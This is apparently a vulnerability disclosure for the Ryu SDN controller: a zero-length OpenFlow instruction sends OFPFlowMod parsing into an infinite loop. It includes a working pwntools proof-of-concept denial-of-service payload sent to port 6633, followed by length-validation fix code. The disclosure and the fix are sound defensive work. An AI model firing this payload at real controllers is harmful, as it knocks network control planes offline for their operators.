In /ryu/ofproto/ofproto_v1_3_parser.py, around line 1050:
class OFPFlowMod(MsgBase):
    ....
        while offset < msg_len:
            i = OFPInstruction.parser(buf, offset)
            instructions.append(i)
            offset += i.len
        msg.instructions = instructions
If OFPInstruction.len is 0, the offset never changes and the parsing falls into an infinite loop.
Start the controller with the following command:
ryu-manager
PoC:
from pwn import *
p=remote("0.0.0.0",6633)
payload=b"\x04\x0e\x00\x50\xd8\xbc\xde\xb7\x67\xf9\x0c\x3f\xfb\xa6\xdb\x87\x6f\x63\x34\xd0\xe1\x26\x43\x78\x5e\x01\x34\x0d\x32\xb4\xb3\xff\x8f\x99\xc0\xe9\x9e\x84\x70\x62\xc7\x4a\xbf\x01\xf3\xf0\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00"
p.send(payload)
p.interactive()
Executing the PoC causes the controller to fall into an infinite loop, after which it no longer works.
The same problem also occurs in the following code:
/ryu/ofproto/ofproto_v1_3_parser.py about line=1050
/ryu/ofproto/ofproto_v1_4_parser.py about line=4453
/ryu/ofproto/ofproto_v1_3_parser.py about line=5321
These affect OpenFlow 1.3, OpenFlow 1.4 and OpenFlow 1.5.
Affected versions: v4.34
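
One way to guard the loop quoted above, as an added example (not Ryu's own code or the project's fix): it walks only the instruction headers with struct and rejects any length that would stall or overrun the walk. The names parse_instruction_headers and MalformedInstruction and the sample bytes are assumptions constructed for illustration, and end is assumed to be no larger than len(buf).

```python
import struct

# OpenFlow instruction header: type (u16), len (u16), network byte order.
INSTRUCTION_HDR = struct.Struct("!HH")


class MalformedInstruction(ValueError):
    """The instruction length field cannot be used to advance the parser."""


def parse_instruction_headers(buf, offset, end):
    """Return (type, len) for each instruction in buf[offset:end].

    Hypothetical helper: each len is validated before it advances offset,
    so the walk terminates on any input, including len == 0.
    """
    instructions = []
    while offset < end:
        remaining = end - offset
        if remaining < INSTRUCTION_HDR.size:
            raise MalformedInstruction("truncated header at offset %d" % offset)
        type_, length = INSTRUCTION_HDR.unpack_from(buf, offset)
        # A len smaller than the header (0 in the report) would leave offset
        # unchanged, or barely moved, and re-read the same bytes.
        if length < INSTRUCTION_HDR.size:
            raise MalformedInstruction("len %d too small at offset %d" % (length, offset))
        # A len past the end of the message would read outside the list.
        if length > remaining:
            raise MalformedInstruction("len %d overruns message at offset %d" % (length, offset))
        instructions.append((type_, length))
        offset += length
    return instructions


# Constructed sample input (not taken from the report's payload).
GOTO_TABLE = struct.pack("!HHB3x", 1, 8, 1)   # type 1, len 8, table_id 1
METER = struct.pack("!HHI", 6, 8, 1)          # type 6, len 8, meter_id 1
ZERO_LEN = struct.pack("!HH4x", 4, 0)         # len 0: the stalling case

if __name__ == "__main__":
    print(parse_instruction_headers(GOTO_TABLE + METER, 0, 16))
    try:
        parse_instruction_headers(GOTO_TABLE + ZERO_LEN, 0, 16)
    except MalformedInstruction as exc:
        print("rejected:", exc)
```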